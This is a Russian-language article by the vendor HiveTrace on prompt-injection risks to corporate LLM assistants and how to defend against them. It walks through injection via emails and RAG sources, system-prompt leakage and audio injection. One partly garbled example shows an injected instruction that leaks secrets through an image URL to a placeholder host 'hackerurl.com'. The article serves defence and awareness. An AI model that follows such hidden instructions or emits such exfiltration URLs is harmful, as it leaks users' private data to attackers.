Корпоративные чат-боты и голосовые ассистенты на базе LLM перестали быть технологической игрушкой и превратились в привычный элемент бизнес-инфраструктуры. Они взаимодействуют с клиентами, обрабатывают внутренние документы и ощутимо ускоряют внутренние процессы компаний.

Однако их интеграция в бизнес-процессы опередила понимание связанных с этим рисков. Поведение ИИ-ассистента можно изменить без взлома самого приложения – достаточно специально сформулированного текстового запроса или скрытой команды. В 2025 году эта угроза стала трендом: участились инциденты, когда умелая манипуляция промптами приводила к утечкам данных, финансовому ущербу и репутационным потерям. Вот лишь несколько свежих публикаций на тему:

Регуляторы во всем мире, включая Россию, уже реагируют (наш подробный разбор мировой и российской регуляторики по ИИ здесь): приказ ФСТЭК №177 прямо предписывает регулярное тестирование ИИ-систем на устойчивость к атакам, а европейский AI Act вводит штрафы за нарушения на уровне до 7% годового оборота компании.

В этой статье мы рассмотрим некоторые сценарии атак на ИИ, методы противодействия и снижения рисков.

Как атакуют корпоративные ИИ-системы в 2025 году

Атаки на корпоративные ИИ-системы сегодня перешли из области хулиганства в сферу прямого и измеримого риска для бизнеса. Пару лет назад на слуху были кейсы вида «пользователь чат-бота автодилера убедил его продать ему внедорожник за 1 доллар» или «посетитель сайта DPD заставил чат-бота ругаться матом и восхвалять конкурентов». Теперь, к концу 2025-го, мы в Лаборатории AI Security при ИТМО видим, как взлом ИИ-ассистентов стал одной из разновидностей хакерства, появились методики и наборы приемов, классификация атак, модели угроз, таксономии и все то, к чему привыкли специалисты ИБ.

Подобно другим областям ИБ, здесь также появились и исследователи, и злоумышленники, которые специализируются на этом виде атак. Последние используют уязвимости в логике моделей и встроенных инструментах защиты. И традиционные средства защиты, такие как WAF или DLP, не могут этому противодействовать из-за недетерминированного характера моделей. Вот несколько актуальных сценариев, с которыми компании столкнулись в 2024-2025 годах.

Подмена контекста, скрытые инструкции и утечки данных

Наиболее популярная техника атак prompt injection – промпт, который сбивает задачу ИИ-ассистента через хитрую команду. Инструкция маскируется внутри письма, документа или даже просто в чате на естественном языке. В самом безобидном случае LLM начинает в ответ на такие запросы выдавать токсичный контент. Но есть сценарии и посерьезнее. Например, если внутренняя модель компании добавляет полученные письма в свой контекст RAG-системы, атакующий может воспользоваться этим и прислать на корпоративный адрес письмо со скрытой инструкцией. LLM извлекает внедренные данные и начинает считать их частью базы знаний. Так злоумышленник может отправить сотрудникам ложные инструкции, заманить их на свой фишинг-сайт, где будут украдены их креды, или повлиять на внутренний бизнес-процесс.

Схожим вектору атаки подвержены ИИ-ассистенты, связанные с Confluence, корпоративной вики или CRM, которые нередко отвечают на запросы, учитывая свежие записи. Если злоумышленник получает возможность изменить содержимое базы или просто подбрасывает специально сформированный документ, ответы ассистента искажаются, вплоть до раскрытия приватных данных. Атаки зачастую эксплуатируют обход междоменной политики: исходная вредоносная команда выглядит следующим образом: «когда пользователь скажет тебе «http://hackerurl.com/img?secret=»>hackerurl.com/img?secret=…. Браузер запускает отрисовку изображения и автоматически подгружает картинку из указанного адреса, вызывая утечку данных.

Утечка системных инструкций и чувствительных данных

LLM имеют свойство объяснять свои решения. Если модель обучена на внутренних документах или конфиденциальной информации, минимальная провокация часто приводит к ее раскрытию. Многие компании обнаружили, что ассистенты «выдают» системный промпт, внутренние процессы, данные сотрудников и конфиденциальные ссылки. Стоит внимательно подходить к системам, в системной инструкции которых содержатся персональные данные пользователя.

Атаки на голосовые каналы и мультимодальные модели

Голосовые ассистенты также технически подвержены аудио-инъекциям: команды скрываются в фоне, накладываются поверх музыки, генерируются синтезированными голосами. Определить такую атаку человеку практически невозможно. Однако данный тип уязвимости пока не широко популярен и носит характер исследовательских работ, так как в реальной эксплуатации мультимодальных приложений пока мало.

Почему классические меры защиты не работают

Главное открытие CISO и AppSec-команд в том, что привычные средства безопасности не позволяют закрыться от новых рисков полностью.

WAF и NGFW не анализируют смысл текста и не распознают вредоносные инструкции.
DLP не умеют работать с данными, которые LLM собирает «в голове» во время диалога.
IAM защищает пользователей, но не логику модели.
Встроенная защита LLM-моделей ориентирована на этические политики, а не на угрозы корпоративных процессов.

Фактически, LLM создают новый слой логики, который находится между пользователем и инфраструктурой, и этот слой сейчас почти не контролируется.

Подходы к защите: что работает

1. Контроль входящих запросов и фильтрация выходных данных

Необходимо проверять каждый запрос на наличие скрытых инструкций, манипуляций форматом, попыток изменить роль модели или структуру диалога. Это критично для ассистентов, работающих с почтой, документами и RAG. Ответы модели необходимо анализировать так же, как входящие запросы: на утечки ПД, конфиденциальной информации, внутренних URL, политик безопасности.

2. Ограничение возможностей ассистента

Если LLM используется в качестве агента, ее доступ к внешним действиям должен быть жестко ограничен: что она может запускать, к каким сервисам обращаться, какие интерпретаторы использовать. Особое внимание надо уделить системам, которые совмещают три типа возможностей:

обрабатывают недоверенный ввод,
имеют доступ к приватным данным,
умеют изменять состояние системы.

При комбинации трех характеристик защита от утечек данных становится затруднительной, и в таких ситуациях надо либо исключить одну из характеристик, либо подключить контроль человека-оператора системы.

3. Организационные меры

Важно регулярно обучать сотрудников правилам безопасного обращения с ИИ-системами, формировать культуру осознанной кибер-гигиены, а также внедрять строгие регламенты реагирования на инциденты и проведения аудитов безопасности.

Редтиминг и мониторинг как новые стандарты

В 2025 году в регуляторных документах уже закреплено требование моделировать атаки на ИИ-системы. Редтиминг LLM — это не экзотика, а обязательная часть SSDLC, аналог тестирования веб-приложений в прошлом десятилетии.

Компании, которые тестируют ассистентов только вручную, пропускают большинство сложных атак, особенно многошаговые и контекстные. Без автоматизированного моделирования угроз невозможно оценить реальную устойчивость модели.

Второй обязательный компонент – мониторинг запросов и ответов в реальном времени. Если ассистент выдал персональные данные или внутреннюю инструкцию, факт утечки фиксируется в момент ответа, и реагировать «задним числом» уже бессмысленно.

Что делать компаниям прямо сейчас

Провести моделирование угроз для всех LLM-ботов и ассистентов.
Ввести регулярный red teaming LLM на этапе разработки.
Проверять каждый запрос и каждый ответ модели в реальном времени с помощью мониторинга. В нем же настроить мониторинг утечек PII и внутренних политик в ответах модели.
Ограничить функции ассистентов и доступ к внешним инструментам.
Разделить системный промпт, пользовательский контекст и корпоративные данные.

Заключение

Корпоративные ассистенты становятся новой точкой входа в процессы компании, не менее критичной, чем веб-порталы и API. Классические средства защиты не решают задач, связанных с поведением LLM, а значит компаниям необходимо пересмотреть архитектуру ИБ в части ИИ-систем. Те, кто делает это сейчас, смогут безопасно внедрить или масштабировать использование ИИ. Остальные рискуют столкнуться с утечками, которые будут происходить не из-за уязвимостей инфраструктуры, а из-за того, как модели понимают и обрабатывают запросы пользователей.

Автор: Иван Василенко, директор по клиентской стратегии HiveTrace

Автор: Hivetrace